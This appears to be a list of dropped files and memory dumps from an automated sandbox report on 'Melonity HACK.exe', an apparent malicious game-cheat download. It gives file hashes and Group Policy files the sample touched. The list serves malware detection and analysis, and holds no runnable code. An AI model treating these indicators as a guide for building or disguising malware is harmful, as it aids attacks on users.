C:\Users\Admin\Downloads\Melonity HACK.exeFilesize
16.8MB
MD501e11b4bf36299650fb033a346b46e76
SHA103f22ac75a70a9687552618ad47b3b86cf26a693
SHA2566ec174d704d09f7d01bd98adc489cf8447d553810f4e7c0d84a13547d6ce16b2
SHA5121971dd33ec5e5d84401a0b00290244ba075a60c8516745c13600794eba5b2b9af3fcdc431a9f42b9c2289871e26ea5cb64fe459acc92dc164073f35163371371
-
C:\Users\Admin\Downloads\Melonity HACK.exeFilesize
16.8MB
MD501e11b4bf36299650fb033a346b46e76
SHA103f22ac75a70a9687552618ad47b3b86cf26a693
SHA2566ec174d704d09f7d01bd98adc489cf8447d553810f4e7c0d84a13547d6ce16b2
SHA5121971dd33ec5e5d84401a0b00290244ba075a60c8516745c13600794eba5b2b9af3fcdc431a9f42b9c2289871e26ea5cb64fe459acc92dc164073f35163371371
-
C:\Windows\SysWOW64\GroupPolicy\gpt.iniFilesize
11B
MD5ec3584f3db838942ec3669db02dc908e
SHA18dceb96874d5c6425ebb81bfee587244c89416da
SHA25677c7c10b4c860d5ddf4e057e713383e61e9f21bcf0ec4cfbbc16193f2e28f340
SHA51235253883bb627a49918e7415a6ba6b765c86b516504d03a1f4fd05f80902f352a7a40e2a67a6d1b99a14b9b79dab82f3ac7a67c512ccf6701256c13d0096855e
-
C:\Windows\System32\GroupPolicy\GPT.INIFilesize
235B
MD554784465609d5525bca207b3944147aa
SHA12218c0745866141a7c820a71ca342779f7e77162
SHA256cded0ecd37bbdbc0ecfd9501f87e9875e9cea87dfa8568c7a973bd500f4a478c
SHA5129affd32ef9f35a5006d9638ec0c221d8c356620702c266aea08118c3e792a121a0443fc3a48fa583f53b63a65f177536d17918a0415964e26010a1f87a07ef3c
-
C:\Windows\System32\GroupPolicy\Machine\Registry.polFilesize
3KB
MD5ca371b43e4ff6dc472a8037c2a5bc69f
SHA15a0ff91820baa64c0dd3aea5bb99d1523973ecec
SHA2567c3fad50fa7fecfab30d70d50df17a90a5e6b887bae5edc482659daef30efb02
SHA512874257d1fce9260b8400f15b38c073e37ce3594fe502573a42e2e236ce8a57d5a9b52e35108ee324c28a734e5b57737cf13272e1e09126b540ad1c89eadf88ec
-
C:\Windows\System32\GroupPolicy\User\Registry.polFilesize
520B
MD50e7c336637fa0448940665f0aa026c96
SHA1bfc72d8957667c7ebc1535848d2a9c0240d98af9
SHA256aace755c854c2d470bcffc53139930eaaf68d2add28bc4b48befa981d2d74ed1
SHA5129884b4b8b54e2b2bb829ee44b88367425a444c6d48d6e12ee22cc888c9fdbff41f92107e8429ade0a257a290609453ff9bd636922a559b9f37c377d438fd7b45
-
\??\pipe\crashpad_2348_PYDJCZQXFFTBTDSKMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/116-192-0x0000000000000000-mapping.dmp
-
memory/212-164-0x0000000000000000-mapping.dmp
-
memory/216-170-0x0000000000000000-mapping.dmp
-
memory/224-205-0x0000000000000000-mapping.dmp
-
memory/940-207-0x0000000000000000-mapping.dmp
-
memory/1120-221-0x0000000140000000-0x0000000141B39000-memory.dmpFilesize
27.2MB
-
memory/1172-179-0x0000000000000000-mapping.dmp
-
memory/1292-218-0x00007FFA00C90000-0x00007FFA01751000-memory.dmpFilesize
10.8MB
-
memory/1292-217-0x000001A639320000-0x000001A639342000-memory.dmpFilesize
136KB
-
memory/1304-195-0x0000000000000000-mapping.dmp
-
memory/1336-175-0x0000000000000000-mapping.dmp
-
memory/1460-177-0x0000000000000000-mapping.dmp
-
memory/1460-201-0x0000000000000000-mapping.dmp
-
memory/1488-211-0x0000000000000000-mapping.dmp
-
memory/1488-202-0x0000000000000000-mapping.dmp
-
memory/1812-209-0x0000000000000000-mapping.dmp
-
memory/1812-187-0x0000000000000000-mapping.dmp
-
memory/1884-213-0x0000000000000000-mapping.dmp
-
memory/1916-225-0x00007FFA00C90000-0x00007FFA01751000-memory.dmp
Filesize: 10.8MB
-
memory/1916-165-0x0000000000000000-mapping.dmp
-
memory/1916-216-0x0000000000000000-mapping.dmp
-
memory/1932-181-0x0000000000000000-mapping.dmp
-
memory/1932-168-0x0000000000000000-mapping.dmp
-
memory/2056-185-0x0000000000000000-mapping.dmp
-
memory/2076-190-0x0000000000000000-mapping.dmp
-
memory/2128-174-0x0000000000000000-mapping.dmp
-
memory/2236-212-0x0000000000000000-mapping.dmp
-
memory/2236-196-0x0000000000000000-mapping.dmp
-
memory/2268-219-0x000002249ACF0000-0x000002249AD10000-memory.dmp
Filesize: 128KB
-
memory/2268-220-0x000002249AD40000-0x000002249AD44000-memory.dmp
Filesize: 16KB
-
memory/2844-162-0x0000000000000000-mapping.dmp
-
memory/2944-171-0x0000000000000000-mapping.dmp
-
memory/3060-194-0x0000000000000000-mapping.dmp
-
memory/3148-138-0x0000000000000000-mapping.dmp
-
memory/3220-167-0x0000000000000000-mapping.dmp
-
memory/3360-161-0x0000000000000000-mapping.dmp
-
memory/3468-200-0x0000000000000000-mapping.dmp
-
memory/3468-160-0x0000000000000000-mapping.dmp
-
memory/3480-204-0x0000000000000000-mapping.dmp
-
memory/3600-173-0x0000000000000000-mapping.dmp
-
memory/3612-189-0x0000000000000000-mapping.dmp
-
memory/3688-214-0x0000000000000000-mapping.dmp
-
memory/3732-140-0x0000000000000000-mapping.dmp
-
memory/3752-169-0x0000000000000000-mapping.dmp
-
memory/3792-203-0x0000000000000000-mapping.dmp
-
memory/3832-199-0x0000000000000000-mapping.dmp
-
memory/3932-132-0x0000000000000000-mapping.dmp
-
memory/4016-176-0x0000000000000000-mapping.dmp
-
memory/4040-215-0x0000000000000000-mapping.dmp
-
memory/4116-166-0x0000000000000000-mapping.dmp
-
memory/4136-143-0x0000000000000000-mapping.dmp
-
memory/4136-146-0x00000000007A0000-0x00000000007AA000-memory.dmp
Filesize: 40KB
-
memory/4232-206-0x0000000000000000-mapping.dmp
-
memory/4244-135-0x0000000000000000-mapping.dmp
-
memory/4252-197-0x0000000000000000-mapping.dmp
-
memory/4284-208-0x0000000000000000-mapping.dmp
-
memory/4320-198-0x0000000000000000-mapping.dmp
-
memory/4324-188-0x0000000000000000-mapping.dmp
-
memory/4324-147-0x0000000000000000-mapping.dmp
-
memory/4492-182-0x0000000000000000-mapping.dmp
-
memory/4552-191-0x0000000000000000-mapping.dmp
-
memory/4692-210-0x0000000000000000-mapping.dmp
-
memory/4692-178-0x0000000000000000-mapping.dmp
-
memory/4712-157-0x0000000000000000-mapping.dmp
-
memory/4728-193-0x0000000000000000-mapping.dmp
-
memory/4776-184-0x0000000000000000-mapping.dmp
-
memory/4828-183-0x0000000000000000-mapping.dmp
-
memory/4856-180-0x0000000000000000-mapping.dmp
-
memory/4856-228-0x0000000140000000-0x0000000141B39000-memory.dmp
Filesize: 27.2MB
-
memory/4856-227-0x0000000140000000-0x0000000141B39000-memory.dmp
Filesize: 27.2MB
-
memory/5000-151-0x0000000000000000-mapping.dmp
-
memory/5000-186-0x0000000000000000-mapping.dmp
-
memory/5116-172-0x0000000000000000-mapping.dmp